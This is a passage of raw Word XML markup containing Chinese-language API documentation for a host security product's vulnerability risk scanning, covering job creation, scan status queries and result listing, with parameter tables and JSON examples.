                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26837424" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C0B4972" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="780D4F03" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="18B4FD33" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72043D52" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27B173F8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DBAAA43" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D22BCE1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>0/1/2 全部主机/agent范围/业务</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>组范围</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="04F67B6F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="726251DC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentIds</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40EB57F0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F996523" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>如果type为1 必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5AC9A61D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="610357E4" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7EE9FD14" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>group</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="719EEB76" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78BC102A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>如果type为2 必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61C516AA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组id范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="584FA164" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EF51D3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>agentIds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"94e4c7a4f5dec750"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5522AC9F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E45269B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">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lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE6E6CB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>如果无在线agent返回：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E30D576"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t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>detail"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0279CFEF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>如果有作业在运行返回：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162AC2EB"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0184629B"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0276665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EC78563" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5754FFD4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72E75DA6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3100B040" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="734A032E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1340B7FA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34DEB748" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F2A1E3F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DD72F99" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>扫描任务ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7968ECA0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>场景说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494AAC23" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>这个</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>调用前需要先调用4.2.2查询风险扫描执行状态接口，如果该接口返回状态非Running， 则可以调用该风险扫描接口创建job。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BA97DA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>异常说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21605792" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>如果任务创建失败， 抛出异常。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080C398F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="189" w:name="_Toc115166169"/>
      <w:bookmarkStart w:id="190" w:name="查询风险扫描执行状态-1"/>
      <w:bookmarkEnd w:id="188"/>
      <w:r>
        <w:t>查询风险扫描执行状态</w:t>
      </w:r>
      <w:bookmarkEnd w:id="189"/>
    </w:p>
    <w:p w14:paraId="5808DB4B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D1BCDC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>app|system|access|account</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/check/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>status</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1747445A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2415F0E9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C7E7AB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280F80D6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/app/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/check/status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CE5300" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07532F39" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "status":"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Running|Success|Failed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4759E0"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788"/>
        <w:gridCol w:w="760"/>
        <w:gridCol w:w="1200"/>
        <w:gridCol w:w="7334"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="4348F2A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54FBABE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6EBBF917" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C4FE10A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F7915DF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="211F88FA" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="609237C0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6471B257" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78D39B87" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>7)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="690287C5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>"执行中;成功;失败"，最近一次job执行状态，如果从未执行过job，状态为Success</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="51D6B4B0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="191" w:name="_Toc115166170"/>
      <w:bookmarkStart w:id="192" w:name="查询风险检测结果-1"/>
      <w:bookmarkEnd w:id="190"/>
      <w:r>
        <w:t>查询风险检测结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="191"/>
    </w:p>
    <w:p w14:paraId="34DEA3EC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C43625C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/ {</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>app|system|access|account</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>list</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="20214428" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3740791D" w14:textId="3A3887E8" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>公共参数（详情参见</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:instrText>HYPERLINK \l "基本请求方法" \h</w:instrText>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:t>基本请求方法</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F732B6C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40559890" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/app/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECAAD59" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3068EB6D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "rows":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">           {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "526fb2d7dd5ec7e9",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>displayIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "172.16.5.118",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>connectionIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "172.16.5.118",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>externalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>internalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "172.16.5.118",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bizGroupId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 4,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bizGroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>qingtenggroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
